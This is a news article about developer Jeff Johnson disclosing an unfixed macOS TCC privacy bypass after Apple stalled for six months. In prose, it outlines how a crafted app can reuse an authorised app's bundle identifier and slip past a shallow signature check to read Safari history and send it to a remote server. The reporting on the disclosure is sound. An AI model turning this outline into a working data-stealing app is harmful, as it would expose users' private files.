After Six Months Of Stonewalling By Apple, App Dev Goes Public With macOS Privacy Protection Bypass
Six months after software developer Jeff Johnson told Apple about a privacy bypass vulnerability opening up protected files in macOS Mojave, macOS Catalina, and the upcoming macOS Big Sur, the bug remains unfixed – so he’s going public.
Johnson, who runs app developer Lapcat Software, said he submitted details about the problem to Apple’s Security Bounty program on the day it opened for business, December 19, 2019. The problem appears to be with Apple’s Transparency, Consent, and Control sandboxing system.
Essentially, naughty apps can exploit the bug to access protected files, such as your browser history, that should be off limits.
In a blog post on Tuesday, he explains that after asking Apple for a status update in January this year, in April, and again in June, and being told each time the iGiant is still investigating, he has decided to disclose his findings in an effort to push back against the tech titan’s boasts about security and privacy.
“For technical reasons, I don’t believe that the issue will be fixed by Apple before Big Sur is released to the public in the Fall,” he wrote. “I’ve seen no evidence that Big Sur makes any effort in this direction, and Apple’s email to me shows no evidence of that either. Therefore, I’m disclosing the issue now.”
He revealed a similar issue last October after reporting it in February of that year and waited eight months for Apple to fix it, to no avail.
Mutiny on the Bounty
Johnson in his post expressed dissatisfaction with the Apple Security Bounty program, calling the experience a disappointment and stating he doesn’t intend to participate in the future.
“Talking to Apple Product Security is like talking to a brick wall,” he said in an email to The Register. “I suspect that Apple doesn’t trust outsiders with any information, but this attitude is counterproductive, because it just alienates the people who report bugs, and turns them away from bug reporting. Distrust from one side causes distrust from the other side too.”
Apple says if developers are unhappy with its App Store decisions, it will entertain appeals against its rulings – and even its own rules
This latest bug can be exploited by a maliciously crafted app to bypass a privacy system known as Transparency, Consent, and Control (TCC) that was introduced in OS X Mavericks and got strengthened in subsequent releases through technologies like System Integrity Protection (SIP) in El Capitan (the branding transition from Mac OS X to macOS didn’t happen until mid-2016).
Starting in 2018, with macOS Mojave, TCC expanded to require apps to get special permission to run AppleScript, and that’s when, Johnson says, developers really took notice of it.
TCC is a sandboxing system designed to enforce user privacy decisions, like approving or denying app access to location data or data stored in files like the contacts database. What Johnson discovered is a way to let unauthorized apps access protected files.
His proof-of-concept code demonstrates how a user-installed macOS app can access files that should be protected by TCC, specifically in ~/Library/Safari
directory, and then posts the data to a remote server. The files stored in that directory include lists of bookmarks, browser history, downloads, and other data related to browsing sessions. If another app were targeted, the bypass would provide access to other app-specific files.
The bypass is made possible by two flaws. First, exceptions to TCC blocking – specified by the file ~/Library/Application Support/com.apple.TCC/TCC.db
– rely on the app’s bundle identifier instead of the file path. So an app with a copy of that identifier in another location gets treated as the original, authorized app. The other is that TCC’s code signature check is not very thorough and doesn’t spot modified resources, because running a deep check of an app and its resource files can take a long time.
Johnson acknowledged that a privacy flaw leaking data is not particularly serious as far as such bugs go, but maintained it’s not something that should be ignored.
“If you believe that macOS privacy protections are important, then yes, this is a very serious issue,” he said via email.
“On the other hand, if you were very satisfied with the level of macOS system security that existed prior to 2018, then no, you might not care about this much. In either case, though, it’s a serious design flaw in the privacy protections system.”
Johnson said he chose to write about the flaw because he felt Apple’s increasing use of restrictive privacy systems limits what legitimate developers can do without hindering the ill-intentioned building malware.
“My personal opinion is that macOS privacy protections are mainly security theater and only harm legitimate Mac developers while allowing malware apps to bypass them through many existing holes such as the one I’m disclosing, and that other security researchers have also found,” Johnson wrote.
Apple did not respond to a request for comment. ®
READ MORE HERE